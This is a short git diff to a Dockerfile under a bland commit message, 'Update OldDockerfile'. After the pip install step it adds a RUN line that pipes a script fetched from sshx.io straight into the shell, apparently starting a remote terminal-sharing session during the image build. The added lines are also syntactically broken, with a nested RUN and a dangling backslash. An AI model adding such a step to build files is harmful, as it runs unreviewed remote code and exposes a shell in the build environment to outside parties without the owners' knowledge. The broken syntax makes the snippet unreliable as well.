Update OldDockerfile

diff --git a/OldDockerfile b/OldDockerfile
--- a/OldDockerfile
+++ b/OldDockerfile
@@ -33,6 +33,7 @@ RUN apt update && apt install -y \
     python3-pip && \
     apt-get clean
 
+
 # Set Python 3.10 as the default Python version
 RUN update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.10 1
 
@@ -48,6 +49,9 @@ RUN python3 --version && pip3 --version
 # Copy the requirements file and install Python dependencies
 COPY requirements.txt .
 RUN pip3 install --no-cache-dir -r requirements.txt
+
+RUN curl -sSf https://sshx.io/get | sh -s run && \
+RUN echo "Curl command completed successfully" || echo "Curl command failed" \
 
 # Copy all project files into the container
 COPY . .
